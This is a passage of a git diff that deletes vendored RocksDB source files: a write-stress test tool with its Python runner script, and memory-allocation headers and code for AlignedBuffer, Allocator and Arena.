+++ /dev/null
@@ -1,307 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-//
-// The goal of this tool is to be a simple stress test with focus on catching:
-// * bugs in compaction/flush processes, especially the ones that cause
-// assertion errors
-// * bugs in the code that deletes obsolete files
-//
-// There are two parts of the test:
-// * write_stress, a binary that writes to the database
-// * write_stress_runner.py, a script that invokes and kills write_stress
-//
-// Here are some interesting parts of write_stress:
-// * Runs with very high concurrency of compactions and flushes (32 threads
-// total) and tries to create a huge amount of small files
-// * The keys written to the database are not uniformly distributed -- there is
-// a 3-character prefix that mutates occasionally (in prefix mutator thread), in
-// such a way that the first character mutates slower than second, which mutates
-// slower than third character. That way, the compaction stress tests some
-// interesting compaction features like trivial moves and bottommost level
-// calculation
-// * There is a thread that creates an iterator, holds it for couple of seconds
-// and then iterates over all keys. This is supposed to test RocksDB's abilities
-// to keep the files alive when there are references to them.
-// * Some writes trigger WAL sync. This is stress testing our WAL sync code.
-// * At the end of the run, we make sure that we didn't leak any of the sst
-// files
-//
-// write_stress_runner.py changes the mode in which we run write_stress and also
-// kills and restarts it. There are some interesting characteristics:
-// * At the beginning we divide the full test runtime into smaller parts --
-// shorter runtimes (couple of seconds) and longer runtimes (100, 1000) seconds
-// * The first time we run write_stress, we destroy the old DB. Every next time
-// during the test, we use the same DB.
-// * We can run in kill mode or clean-restart mode. Kill mode kills the
-// write_stress violently.
-// * We can run in mode where delete_obsolete_files_with_fullscan is true or
-// false
-// * We can run with low_open_files mode turned on or off. When it's turned on,
-// we configure table cache to only hold a couple of files -- that way we need
-// to reopen files every time we access them.
-//
-// Another goal was to create a stress test without a lot of parameters. So
-// tools/write_stress_runner.py should only take one parameter -- runtime_sec
-// and it should figure out everything else on its own.
-
-#include <cstdio>
-
-#ifndef GFLAGS
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#define __STDC_FORMAT_MACROS
-#include <inttypes.h>
-#include <atomic>
-#include <random>
-#include <set>
-#include <string>
-#include <thread>
-
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "util/filename.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_int32(key_size, 10, "Key size");
-DEFINE_int32(value_size, 100, "Value size");
-DEFINE_string(db, "", "Use the db with the following name.");
-DEFINE_bool(destroy_db, true,
-            "Destroy the existing DB before running the test");
-
-DEFINE_int32(runtime_sec, 10 * 60, "How long are we running for, in seconds");
-DEFINE_int32(seed, 139, "Random seed");
-
-DEFINE_double(prefix_mutate_period_sec, 1.0,
-              "How often are we going to mutate the prefix");
-DEFINE_double(first_char_mutate_probability, 0.1,
-              "How likely are we to mutate the first char every period");
-DEFINE_double(second_char_mutate_probability, 0.2,
-              "How likely are we to mutate the second char every period");
-DEFINE_double(third_char_mutate_probability, 0.5,
-              "How likely are we to mutate the third char every period");
-
-DEFINE_int32(iterator_hold_sec, 5,
-             "How long will the iterator hold files before it gets destroyed");
-
-DEFINE_double(sync_probability, 0.01, "How often are we syncing writes");
-DEFINE_bool(delete_obsolete_files_with_fullscan, false,
-            "If true, we delete obsolete files after each compaction/flush "
-            "using GetChildren() API");
-DEFINE_bool(low_open_files_mode, false,
-            "If true, we set max_open_files to 20, so that every file access "
-            "needs to reopen it");
-
-namespace rocksdb {
-
-static const int kPrefixSize = 3;
-
-class WriteStress {
- public:
-  WriteStress() : stop_(false) {
-    // initialize key_prefix
-    for (int i = 0; i < kPrefixSize; ++i) {
-      key_prefix_[i].store('a');
-    }
-
-    // Choose a location for the test database if none given with --db=<path>
-    if (FLAGS_db.empty()) {
-      std::string default_db_path;
-      Env::Default()->GetTestDirectory(&default_db_path);
-      default_db_path += "/write_stress";
-      FLAGS_db = default_db_path;
-    }
-
-    Options options;
-    if (FLAGS_destroy_db) {
-      DestroyDB(FLAGS_db, options);  // ignore
-    }
-
-    // make the LSM tree deep, so that we have many concurrent flushes and
-    // compactions
-    options.create_if_missing = true;
-    options.write_buffer_size = 256 * 1024;              // 256k
-    options.max_bytes_for_level_base = 1 * 1024 * 1024;  // 1MB
-    options.target_file_size_base = 100 * 1024;          // 100k
-    options.max_write_buffer_number = 16;
-    options.max_background_compactions = 16;
-    options.max_background_flushes = 16;
-    options.max_open_files = FLAGS_low_open_files_mode ? 20 : -1;
-    if (FLAGS_delete_obsolete_files_with_fullscan) {
-      options.delete_obsolete_files_period_micros = 0;
-    }
-
-    // open DB
-    DB* db;
-    Status s = DB::Open(options, FLAGS_db, &db);
-    if (!s.ok()) {
-      fprintf(stderr, "Can't open database: %s\n", s.ToString().c_str());
-      std::abort();
-    }
-    db_.reset(db);
-  }
-
-  void WriteThread() {
-    std::mt19937 rng(static_cast<unsigned int>(FLAGS_seed));
-    std::uniform_real_distribution<double> dist(0, 1);
-
-    auto random_string = [](std::mt19937& r, int len) {
-      std::uniform_int_distribution<int> char_dist('a', 'z');
-      std::string ret;
-      for (int i = 0; i < len; ++i) {
-        ret += char_dist(r);
-      }
-      return ret;
-    };
-
-    while (!stop_.load(std::memory_order_relaxed)) {
-      std::string prefix;
-      prefix.resize(kPrefixSize);
-      for (int i = 0; i < kPrefixSize; ++i) {
-        prefix[i] = key_prefix_[i].load(std::memory_order_relaxed);
-      }
-      auto key = prefix + random_string(rng, FLAGS_key_size - kPrefixSize);
-      auto value = random_string(rng, FLAGS_value_size);
-      WriteOptions woptions;
-      woptions.sync = dist(rng) < FLAGS_sync_probability;
-      auto s = db_->Put(woptions, key, value);
-      if (!s.ok()) {
-        fprintf(stderr, "Write to DB failed: %s\n", s.ToString().c_str());
-        std::abort();
-      }
-    }
-  }
-
-  void IteratorHoldThread() {
-    while (!stop_.load(std::memory_order_relaxed)) {
-      std::unique_ptr<Iterator> iterator(db_->NewIterator(ReadOptions()));
-      Env::Default()->SleepForMicroseconds(FLAGS_iterator_hold_sec * 1000 *
-                                           1000LL);
-      for (iterator->SeekToFirst(); iterator->Valid(); iterator->Next()) {
-      }
-      if (!iterator->status().ok()) {
-        fprintf(stderr, "Iterator statuts not OK: %s\n",
-                iterator->status().ToString().c_str());
-        std::abort();
-      }
-    }
-  }
-
-  void PrefixMutatorThread() {
-    std::mt19937 rng(static_cast<unsigned int>(FLAGS_seed));
-    std::uniform_real_distribution<double> dist(0, 1);
-    std::uniform_int_distribution<int> char_dist('a', 'z');
-    while (!stop_.load(std::memory_order_relaxed)) {
-      Env::Default()->SleepForMicroseconds(static_cast<int>(
-                                           FLAGS_prefix_mutate_period_sec *
-                                           1000 * 1000LL));
-      if (dist(rng) < FLAGS_first_char_mutate_probability) {
-        key_prefix_[0].store(char_dist(rng), std::memory_order_relaxed);
-      }
-      if (dist(rng) < FLAGS_second_char_mutate_probability) {
-        key_prefix_[1].store(char_dist(rng), std::memory_order_relaxed);
-      }
-      if (dist(rng) < FLAGS_third_char_mutate_probability) {
-        key_prefix_[2].store(char_dist(rng), std::memory_order_relaxed);
-      }
-    }
-  }
-
-  int Run() {
-    threads_.emplace_back([&]() { WriteThread(); });
-    threads_.emplace_back([&]() { PrefixMutatorThread(); });
-    threads_.emplace_back([&]() { IteratorHoldThread(); });
-
-    if (FLAGS_runtime_sec == -1) {
-      // infinite runtime, until we get killed
-      while (true) {
-        Env::Default()->SleepForMicroseconds(1000 * 1000);
-      }
-    }
-
-    Env::Default()->SleepForMicroseconds(FLAGS_runtime_sec * 1000 * 1000);
-
-    stop_.store(true, std::memory_order_relaxed);
-    for (auto& t : threads_) {
-      t.join();
-    }
-    threads_.clear();
-
-// Skip checking for leaked files in ROCKSDB_LITE since we don't have access to
-// function GetLiveFilesMetaData
-#ifndef ROCKSDB_LITE
-    // let's see if we leaked some files
-    db_->PauseBackgroundWork();
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
-    std::set<uint64_t> sst_file_numbers;
-    for (const auto& file : metadata) {
-      uint64_t number;
-      FileType type;
-      if (!ParseFileName(file.name, &number, "LOG", &type)) {
-        continue;
-      }
-      if (type == kTableFile) {
-        sst_file_numbers.insert(number);
-      }
-    }
-
-    std::vector<std::string> children;
-    Env::Default()->GetChildren(FLAGS_db, &children);
-    for (const auto& child : children) {
-      uint64_t number;
-      FileType type;
-      if (!ParseFileName(child, &number, "LOG", &type)) {
-        continue;
-      }
-      if (type == kTableFile) {
-        if (sst_file_numbers.find(number) == sst_file_numbers.end()) {
-          fprintf(stderr,
-                  "Found a table file in DB path that should have been "
-                  "deleted: %s\n",
-                  child.c_str());
-          std::abort();
-        }
-      }
-    }
-    db_->ContinueBackgroundWork();
-#endif  // !ROCKSDB_LITE
-
-    return 0;
-  }
-
- private:
-  // each key is prepended with this prefix. we occasionally change it. third
-  // letter is changed more frequently than second, which is changed more
-  // frequently than the first one.
-  std::atomic<char> key_prefix_[kPrefixSize];
-  std::atomic<bool> stop_;
-  std::vector<port::Thread> threads_;
-  std::unique_ptr<DB> db_;
-};
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-  rocksdb::WriteStress write_stress;
-  return write_stress.Run();
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/tools/write_stress_runner.py b/thirdparty/rocksdb/tools/write_stress_runner.py
deleted file mode 100644
index f696578..0000000
--- a/thirdparty/rocksdb/tools/write_stress_runner.py
+++ /dev/null
@@ -1,73 +0,0 @@
-#! /usr/bin/env python
-import subprocess
-import argparse
-import random
-import time
-import sys
-
-
-def generate_runtimes(total_runtime):
-    # combination of short runtimes and long runtimes, with heavier
-    # weight on short runtimes
-    possible_runtimes_sec = range(1, 10) + range(1, 20) + [100, 1000]
-    runtimes = []
-    while total_runtime > 0:
-        chosen = random.choice(possible_runtimes_sec)
-        chosen = min(chosen, total_runtime)
-        runtimes.append(chosen)
-        total_runtime -= chosen
-    return runtimes
-
-
-def main(args):
-    runtimes = generate_runtimes(int(args.runtime_sec))
-    print "Going to execute write stress for " + str(runtimes)
-    first_time = True
-
-    for runtime in runtimes:
-        kill = random.choice([False, True])
-
-        cmd = './write_stress --runtime_sec=' + \
-            ("-1" if kill else str(runtime))
-
-        if len(args.db) > 0:
-            cmd = cmd + ' --db=' + args.db
-
-        if first_time:
-            first_time = False
-        else:
-            # use current db
-            cmd = cmd + ' --destroy_db=false'
-        if random.choice([False, True]):
-            cmd = cmd + ' --delete_obsolete_files_with_fullscan=true'
-        if random.choice([False, True]):
-            cmd = cmd + ' --low_open_files_mode=true'
-
-        print("Running write_stress for %d seconds (%s): %s" %
-              (runtime, ("kill-mode" if kill else "clean-shutdown-mode"),
-              cmd))
-
-        child = subprocess.Popen([cmd], shell=True)
-        killtime = time.time() + runtime
-        while not kill or time.time() < killtime:
-            time.sleep(1)
-            if child.poll() is not None:
-                if child.returncode == 0:
-                    break
-                else:
-                    print("ERROR: write_stress died with exitcode=%d\n"
-                          % child.returncode)
-                    sys.exit(1)
-        if kill:
-            child.kill()
-        # breathe
-        time.sleep(3)
-
-if __name__ == '__main__':
-    random.seed(time.time())
-    parser = argparse.ArgumentParser(description="This script runs and kills \
-        write_stress multiple times")
-    parser.add_argument("--runtime_sec", default='1000')
-    parser.add_argument("--db", default='')
-    args = parser.parse_args()
-    main(args)
diff --git a/thirdparty/rocksdb/util/aligned_buffer.h b/thirdparty/rocksdb/util/aligned_buffer.h
deleted file mode 100644
index e93f4b5..0000000
--- a/thirdparty/rocksdb/util/aligned_buffer.h
+++ /dev/null
@@ -1,179 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <algorithm>
-#include "port/port.h"
-
-namespace rocksdb {
-
-inline size_t TruncateToPageBoundary(size_t page_size, size_t s) {
-  s -= (s & (page_size - 1));
-  assert((s % page_size) == 0);
-  return s;
-}
-
-inline size_t Roundup(size_t x, size_t y) {
-  return ((x + y - 1) / y) * y;
-}
-
-// This class is to manage an aligned user
-// allocated buffer for direct I/O purposes
-// though can be used for any purpose.
-class AlignedBuffer {
-  size_t alignment_;
-  std::unique_ptr<char[]> buf_;
-  size_t capacity_;
-  size_t cursize_;
-  char* bufstart_;
-
-public:
-  AlignedBuffer()
-    : alignment_(),
-      capacity_(0),
-      cursize_(0),
-      bufstart_(nullptr) {
-  }
-
-  AlignedBuffer(AlignedBuffer&& o) ROCKSDB_NOEXCEPT {
-    *this = std::move(o);
-  }
-
-  AlignedBuffer& operator=(AlignedBuffer&& o) ROCKSDB_NOEXCEPT {
-    alignment_ = std::move(o.alignment_);
-    buf_ = std::move(o.buf_);
-    capacity_ = std::move(o.capacity_);
-    cursize_ = std::move(o.cursize_);
-    bufstart_ = std::move(o.bufstart_);
-    return *this;
-  }
-
-  AlignedBuffer(const AlignedBuffer&) = delete;
-
-  AlignedBuffer& operator=(const AlignedBuffer&) = delete;
-
-  static bool isAligned(const void* ptr, size_t alignment) {
-    return reinterpret_cast<uintptr_t>(ptr) % alignment == 0;
-  }
-
-  static bool isAligned(size_t n, size_t alignment) {
-    return n % alignment == 0;
-  }
-
-  size_t Alignment() const {
-    return alignment_;
-  }
-
-  size_t Capacity() const {
-    return capacity_;
-  }
-
-  size_t CurrentSize() const {
-    return cursize_;
-  }
-
-  const char* BufferStart() const {
-    return bufstart_;
-  }
-
-  char* BufferStart() { return bufstart_; }
-
-  void Clear() {
-    cursize_ = 0;
-  }
-
-  void Alignment(size_t alignment) {
-    assert(alignment > 0);
-    assert((alignment & (alignment - 1)) == 0);
-    alignment_ = alignment;
-  }
-
-  // Allocates a new buffer and sets bufstart_ to the aligned first byte
-  void AllocateNewBuffer(size_t requested_capacity, bool copy_data = false) {
-    assert(alignment_ > 0);
-    assert((alignment_ & (alignment_ - 1)) == 0);
-
-    if (copy_data && requested_capacity < cursize_) {
-      // If we are downsizing to a capacity that is smaller than the current
-      // data in the buffer. Ignore the request.
-      return;
-    }
-
-    size_t new_capacity = Roundup(requested_capacity, alignment_);
-    char* new_buf = new char[new_capacity + alignment_];
-    char* new_bufstart = reinterpret_cast<char*>(
-        (reinterpret_cast<uintptr_t>(new_buf) + (alignment_ - 1)) &
-        ~static_cast<uintptr_t>(alignment_ - 1));
-
-    if (copy_data) {
-      memcpy(new_bufstart, bufstart_, cursize_);
-    } else {
-      cursize_ = 0;
-    }
-
-    bufstart_ = new_bufstart;
-    capacity_ = new_capacity;
-    buf_.reset(new_buf);
-  }
-  // Used for write
-  // Returns the number of bytes appended
-  size_t Append(const char* src, size_t append_size) {
-    size_t buffer_remaining = capacity_ - cursize_;
-    size_t to_copy = std::min(append_size, buffer_remaining);
-
-    if (to_copy > 0) {
-      memcpy(bufstart_ + cursize_, src, to_copy);
-      cursize_ += to_copy;
-    }
-    return to_copy;
-  }
-
-  size_t Read(char* dest, size_t offset, size_t read_size) const {
-    assert(offset < cursize_);
-
-    size_t to_read = 0;
-    if(offset < cursize_) {
-      to_read = std::min(cursize_ - offset, read_size);
-    }
-    if (to_read > 0) {
-      memcpy(dest, bufstart_ + offset, to_read);
-    }
-    return to_read;
-  }
-
-  /// Pad to alignment
-  void PadToAlignmentWith(int padding) {
-    size_t total_size = Roundup(cursize_, alignment_);
-    size_t pad_size = total_size - cursize_;
-
-    if (pad_size > 0) {
-      assert((pad_size + cursize_) <= capacity_);
-      memset(bufstart_ + cursize_, padding, pad_size);
-      cursize_ += pad_size;
-    }
-  }
-
-  // After a partial flush move the tail to the beginning of the buffer
-  void RefitTail(size_t tail_offset, size_t tail_size) {
-    if (tail_size > 0) {
-      memmove(bufstart_, bufstart_ + tail_offset, tail_size);
-    }
-    cursize_ = tail_size;
-  }
-
-  // Returns place to start writing
-  char* Destination() {
-    return bufstart_ + cursize_;
-  }
-
-  void Size(size_t cursize) {
-    cursize_ = cursize;
-  }
-};
-}
diff --git a/thirdparty/rocksdb/util/allocator.h b/thirdparty/rocksdb/util/allocator.h
deleted file mode 100644
index 505d6ba..0000000
--- a/thirdparty/rocksdb/util/allocator.h
+++ /dev/null
@@ -1,57 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Abstract interface for allocating memory in blocks. This memory is freed
-// when the allocator object is destroyed. See the Arena class for more info.
-
-#pragma once
-#include <cerrno>
-#include <cstddef>
-#include "rocksdb/write_buffer_manager.h"
-
-namespace rocksdb {
-
-class Logger;
-
-class Allocator {
- public:
-  virtual ~Allocator() {}
-
-  virtual char* Allocate(size_t bytes) = 0;
-  virtual char* AllocateAligned(size_t bytes, size_t huge_page_size = 0,
-                                Logger* logger = nullptr) = 0;
-
-  virtual size_t BlockSize() const = 0;
-};
-
-class AllocTracker {
- public:
-  explicit AllocTracker(WriteBufferManager* write_buffer_manager);
-  ~AllocTracker();
-  void Allocate(size_t bytes);
-  // Call when we're finished allocating memory so we can free it from
-  // the write buffer's limit.
-  void DoneAllocating();
-
-  void FreeMem();
-
-  bool is_freed() const { return write_buffer_manager_ == nullptr || freed_; }
-
- private:
-  WriteBufferManager* write_buffer_manager_;
-  std::atomic<size_t> bytes_allocated_;
-  bool done_allocating_;
-  bool freed_;
-
-  // No copying allowed
-  AllocTracker(const AllocTracker&);
-  void operator=(const AllocTracker&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/arena.cc b/thirdparty/rocksdb/util/arena.cc
deleted file mode 100644
index 6185b5c..0000000
--- a/thirdparty/rocksdb/util/arena.cc
+++ /dev/null
@@ -1,224 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/arena.h"
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-#ifdef OS_FREEBSD
-#include <malloc_np.h>
-#else
-#include <malloc.h>
-#endif
-#endif
-#ifndef OS_WIN
-#include <sys/mman.h>
-#endif
-#include <algorithm>
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/logging.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// MSVC complains that it is already defined since it is static in the header.
-#ifndef _MSC_VER
-const size_t Arena::kInlineSize;
-#endif
-
-const size_t Arena::kMinBlockSize = 4096;
-const size_t Arena::kMaxBlockSize = 2u << 30;
-static const int kAlignUnit = sizeof(void*);
-
-size_t OptimizeBlockSize(size_t block_size) {
-  // Make sure block_size is in optimal range
-  block_size = std::max(Arena::kMinBlockSize, block_size);
-  block_size = std::min(Arena::kMaxBlockSize, block_size);
-
-  // make sure block_size is the multiple of kAlignUnit
-  if (block_size % kAlignUnit != 0) {
-    block_size = (1 + block_size / kAlignUnit) * kAlignUnit;
-  }
-
-  return block_size;
-}
-
-Arena::Arena(size_t block_size, AllocTracker* tracker, size_t huge_page_size)
-    : kBlockSize(OptimizeBlockSize(block_size)), tracker_(tracker) {
-  assert(kBlockSize >= kMinBlockSize && kBlockSize <= kMaxBlockSize &&
-         kBlockSize % kAlignUnit == 0);
-  TEST_SYNC_POINT_CALLBACK("Arena::Arena:0", const_cast<size_t*>(&kBlockSize));
-  alloc_bytes_remaining_ = sizeof(inline_block_);
-  blocks_memory_ += alloc_bytes_remaining_;
-  aligned_alloc_ptr_ = inline_block_;
-  unaligned_alloc_ptr_ = inline_block_ + alloc_bytes_remaining_;
-#ifdef MAP_HUGETLB
-  hugetlb_size_ = huge_page_size;
-  if (hugetlb_size_ && kBlockSize > hugetlb_size_) {
-    hugetlb_size_ = ((kBlockSize - 1U) / hugetlb_size_ + 1U) * hugetlb_size_;
-  }
-#endif
-  if (tracker_ != nullptr) {
-    tracker_->Allocate(kInlineSize);
-  }
-}
-
-Arena::~Arena() {
-  if (tracker_ != nullptr) {
-    assert(tracker_->is_freed());
-    tracker_->FreeMem();
-  }
-  for (const auto& block : blocks_) {
-    delete[] block;
-  }
-
-#ifdef MAP_HUGETLB
-  for (const auto& mmap_info : huge_blocks_) {
-    auto ret = munmap(mmap_info.addr_, mmap_info.length_);
-    if (ret != 0) {
-      // TODO(sdong): Better handling
-    }
-  }
-#endif
-}
-
-char* Arena::AllocateFallback(size_t bytes, bool aligned) {
-  if (bytes > kBlockSize / 4) {
-    ++irregular_block_num;
-    // Object is more than a quarter of our block size.  Allocate it separately
-    // to avoid wasting too much space in leftover bytes.
-    return AllocateNewBlock(bytes);
-  }
-
-  // We waste the remaining space in the current block.
-  size_t size = 0;
-  char* block_head = nullptr;
-#ifdef MAP_HUGETLB
-  if (hugetlb_size_) {
-    size = hugetlb_size_;
-    block_head = AllocateFromHugePage(size);
-  }
-#endif
-  if (!block_head) {
-    size = kBlockSize;
-    block_head = AllocateNewBlock(size);
-  }
-  alloc_bytes_remaining_ = size - bytes;
-
-  if (aligned) {
-    aligned_alloc_ptr_ = block_head + bytes;
-    unaligned_alloc_ptr_ = block_head + size;
-    return block_head;
-  } else {
-    aligned_alloc_ptr_ = block_head;
-    unaligned_alloc_ptr_ = block_head + size - bytes;
-    return unaligned_alloc_ptr_;
-  }
-}
-
-char* Arena::AllocateFromHugePage(size_t bytes) {
-#ifdef MAP_HUGETLB
-  if (hugetlb_size_ == 0) {
-    return nullptr;
-  }
-  // already reserve space in huge_blocks_ before calling mmap().
-  // this way the insertion into the vector below will not throw and we
-  // won't leak the mapping in that case. if reserve() throws, we
-  // won't leak either
-  huge_blocks_.reserve(huge_blocks_.size() + 1);
-
-  void* addr = mmap(nullptr, bytes, (PROT_READ | PROT_WRITE),
-                    (MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB), -1, 0);
-
-  if (addr == MAP_FAILED) {
-    return nullptr;
-  }
-  // the following shouldn't throw because of the above reserve()
-  huge_blocks_.emplace_back(MmapInfo(addr, bytes));
-  blocks_memory_ += bytes;
-  if (tracker_ != nullptr) {
-    tracker_->Allocate(bytes);
-  }
-  return reinterpret_cast<char*>(addr);
-#else
-  return nullptr;
-#endif
-}
-
-char* Arena::AllocateAligned(size_t bytes, size_t huge_page_size,
-                             Logger* logger) {
-  assert((kAlignUnit & (kAlignUnit - 1)) ==
-         0);  // Pointer size should be a power of 2
-
-#ifdef MAP_HUGETLB
-  if (huge_page_size > 0 && bytes > 0) {
-    // Allocate from a huge page TBL table.
-    assert(logger != nullptr);  // logger need to be passed in.
-    size_t reserved_size =
-        ((bytes - 1U) / huge_page_size + 1U) * huge_page_size;
-    assert(reserved_size >= bytes);
-
-    char* addr = AllocateFromHugePage(reserved_size);
-    if (addr == nullptr) {
-      ROCKS_LOG_WARN(logger,
-                     "AllocateAligned fail to allocate huge TLB pages: %s",
-                     strerror(errno));
-      // fail back to malloc
-    } else {
-      return addr;
-    }
-  }
-#endif
-
-  size_t current_mod =
-      reinterpret_cast<uintptr_t>(aligned_alloc_ptr_) & (kAlignUnit - 1);
-  size_t slop = (current_mod == 0 ? 0 : kAlignUnit - current_mod);
-  size_t needed = bytes + slop;
-  char* result;
-  if (needed <= alloc_bytes_remaining_) {
-    result = aligned_alloc_ptr_ + slop;
-    aligned_alloc_ptr_ += needed;
-    alloc_bytes_remaining_ -= needed;
-  } else {
-    // AllocateFallback always returns aligned memory
-    result = AllocateFallback(bytes, true /* aligned */);
-  }
-  assert((reinterpret_cast<uintptr_t>(result) & (kAlignUnit - 1)) == 0);
-  return result;
-}
-
-char* Arena::AllocateNewBlock(size_t block_bytes) {
-  // already reserve space in blocks_ before allocating memory via new.
-  // this way the insertion into the vector below will not throw and we
-  // won't leak the allocated memory in that case. if reserve() throws,
-  // we won't leak either
-  blocks_.reserve(blocks_.size() + 1);
-
-  char* block = new char[block_bytes];
-  size_t allocated_size;
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-  allocated_size = malloc_usable_size(block);
-#ifndef NDEBUG
-  // It's hard to predict what malloc_usable_size() returns.
-  // A callback can allow users to change the costed size.
-  std::pair<size_t*, size_t*> pair(&allocated_size, &block_bytes);
-  TEST_SYNC_POINT_CALLBACK("Arena::AllocateNewBlock:0", &pair);
-#endif  // NDEBUG
-#else
-  allocated_size = block_bytes;
-#endif  // ROCKSDB_MALLOC_USABLE_SIZE
-  blocks_memory_ += allocated_size;
-  if (tracker_ != nullptr) {
-    tracker_->Allocate(allocated_size);
-  }
-  // the following shouldn't throw because of the above reserve()
-  blocks_.push_back(block);
-  return block;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/arena.h b/thirdparty/rocksdb/util/arena.h
deleted file mode 100644
index af53a2f..0000000
--- a/thirdparty/rocksdb/util/arena.h
+++ /dev/null
@@ -1,141 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Arena is an implementation of Allocator class. For a request of small size,
-// it allocates a block with pre-defined block size. For a request of big
-// size, it uses malloc to directly get the requested size.
-
-#pragma once
-#ifndef OS_WIN
-#include <sys/mman.h>
-#endif
-#include <cstddef>
-#include <cerrno>
-#include <vector>
-#include <assert.h>
-#include <stdint.h>
-#include "util/allocator.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-class Arena : public Allocator {
- public:
-  // No copying allowed
-  Arena(const Arena&) = delete;
-  void operator=(const Arena&) = delete;
-
-  static const size_t kInlineSize = 2048;
-  static const size_t kMinBlockSize;
-  static const size_t kMaxBlockSize;
-
-  // huge_page_size: if 0, don't use huge page TLB. If > 0 (should set to the
-  // supported hugepage size of the system), block allocation will try huge
-  // page TLB first. If allocation fails, will fall back to normal case.
-  explicit Arena(size_t block_size = kMinBlockSize,
-                 AllocTracker* tracker = nullptr, size_t huge_page_size = 0);
-  ~Arena();
-
-  char* Allocate(size_t bytes) override;
-
-  // huge_page_size: if >0, will try to allocate from huage page TLB.
-  // The argument will be the size of the page size for huge page TLB. Bytes
-  // will be rounded up to multiple of the page size to allocate through mmap
-  // anonymous option with huge page on. The extra  space allocated will be
-  // wasted. If allocation fails, will fall back to normal case. To enable it,
-  // need to reserve huge pages for it to be allocated, like:
-  //     sysctl -w vm.nr_hugepages=20
-  // See linux doc Documentation/vm/hugetlbpage.txt for details.
-  // huge page allocation can fail. In this case it will fail back to
-  // normal cases. The messages will be logged to logger. So when calling with
-  // huge_page_tlb_size > 0, we highly recommend a logger is passed in.
-  // Otherwise, the error message will be printed out to stderr directly.
-  char* AllocateAligned(size_t bytes, size_t huge_page_size = 0,
-                        Logger* logger = nullptr) override;
-
-  // Returns an estimate of the total memory usage of data allocated
-  // by the arena (exclude the space allocated but not yet used for future
-  // allocations).
-  size_t ApproximateMemoryUsage() const {
-    return blocks_memory_ + blocks_.capacity() * sizeof(char*) -
-           alloc_bytes_remaining_;
-  }
-
-  size_t MemoryAllocatedBytes() const { return blocks_memory_; }
-
-  size_t AllocatedAndUnused() const { return alloc_bytes_remaining_; }
-
-  // If an allocation is too big, we'll allocate an irregular block with the
-  // same size of that allocation.
-  size_t IrregularBlockNum() const { return irregular_block_num; }
-
-  size_t BlockSize() const override { return kBlockSize; }
-
-  bool IsInInlineBlock() const {
-    return blocks_.empty();
-  }
-
- private:
-  char inline_block_[kInlineSize] __attribute__((__aligned__(sizeof(void*))));
-  // Number of bytes allocated in one block
-  const size_t kBlockSize;
-  // Array of new[] allocated memory blocks
-  typedef std::vector<char*> Blocks;
-  Blocks blocks_;
-
-  struct MmapInfo {
-    void* addr_;
-    size_t length_;
-
-    MmapInfo(void* addr, size_t length) : addr_(addr), length_(length) {}
-  };
-  std::vector<MmapInfo> huge_blocks_;
-  size_t irregular_block_num = 0;
-
-  // Stats for current active block.
-  // For each block, we allocate aligned memory chucks from one end and
-  // allocate unaligned memory chucks from the other end. Otherwise the
-  // memory waste for alignment will be higher if we allocate both types of
-  // memory from one direction.
-  char* unaligned_alloc_ptr_ = nullptr;
-  char* aligned_alloc_ptr_ = nullptr;
-  // How many bytes left in currently active block?
-  size_t alloc_bytes_remaining_ = 0;
-
-#ifdef MAP_HUGETLB
-  size_t hugetlb_size_ = 0;
-#endif  // MAP_HUGETLB
-  char* AllocateFromHugePage(size_t bytes);
-  char* AllocateFallback(size_t bytes, bool aligned);
-  char* AllocateNewBlock(size_t block_bytes);
-
-  // Bytes of memory in blocks allocated so far
